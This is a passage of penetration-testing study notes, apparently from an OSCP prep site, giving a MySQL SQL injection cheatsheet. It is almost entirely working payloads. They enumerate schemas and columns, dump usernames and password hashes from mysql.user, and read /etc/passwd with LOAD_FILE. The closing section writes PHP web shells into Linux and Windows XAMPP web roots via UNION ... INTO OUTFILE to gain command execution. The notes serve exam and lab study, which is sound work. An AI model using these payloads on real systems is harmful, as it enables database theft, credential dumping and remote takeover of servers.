// notes/ Web Exploitation
🕸️

SQL Injection MySQL Cheatsheet

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_mysql-cheatsheet

MySQL Cheatsheet

code
01SELECT database()
02SELECT schema_name FROM information_schema.schemata
03SELECT schema_name FROM information_schema.schemata LIMIT 1
04SELECT schema_name FROM information_schema.schemata LIMIT 2,1 <-- Grab second entry output limit of 1
05SELECT group_concat(schema_name,":") FROM information_schema.schemata
06SELECT group_concat(schema_name,"\r\n") FROM information_schema.schemata
07SELECT group_concat(host,":",user,":",password,"\r\n") FROM mysql.user
code
01SELECT schema_name FROM information_schema.schemata
02
code
01select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'
code
01select group_concat(host,":",user,":",password,"\r\n") from mysql.user
code
01LOAD_FILE("/etc/passwd")
02TO_base64(LOAD_FILE("/etc/passwd"))
code
01'union select 1,2,3,4,5-- -
02
03' union select 1, table_name, column_name, table_schema, 5 from
04information_schema.columns where table_schema=database() -- //

SQL injection into RCE

code
01select user()

Check write privileges

code
01select group_concat(grantee,is_grantable,0x3c62723e) from information_schema.user_privileges

For Linux

code
01union select ("<?php system($_GET["cmd"]);?>),2,3,4,5 into outfile
02"/var/www/html/cmd.php" -- -
code
01' UNION SELECT "<?php system($_GET['cmd']);?>", null, null,
02null, null INTO OUTFILE "/var/www/html/tmp/cmd.php" -- -

For Windows Xampp

code
01union select 1,('<?php echo shell_exec($_GET["cmd"]); ?>'),3 into outfile 'C:\\xampp\\htdocs\\cmd.php'-- -